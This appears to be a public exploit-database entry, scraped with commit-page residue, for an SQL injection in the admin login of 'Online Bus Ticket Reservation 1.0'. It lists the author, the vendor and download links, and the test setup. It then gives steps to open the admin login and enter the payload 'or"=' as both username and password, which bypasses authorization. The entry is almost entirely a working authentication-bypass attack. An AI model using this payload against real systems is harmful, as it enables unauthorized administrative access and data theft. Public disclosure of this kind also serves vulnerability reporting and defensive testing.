78d4c26b55
2 changes to exploits/shellcodes Online Bus Ticket Reservation 1.0 - SQL Injection Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting
20 lines
No EOL
713 B
Text
20 lines
No EOL
713 B
Text
# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
|
|
# Date: 2020-12-07
|
|
# Exploit Author: Sakshi Sharma
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
|
|
|
|
|
|
#Vulnerable Page: admin page
|
|
|
|
#Exploit
|
|
Open the Application
|
|
check the URL:
|
|
http://localhost/busreservation/index.php
|
|
Open Admin Login
|
|
Enter username: 'or"='
|
|
Enter password: 'or"='
|
|
click on login
|
|
The SQL payload gets executed and authorization is bypassed successfully |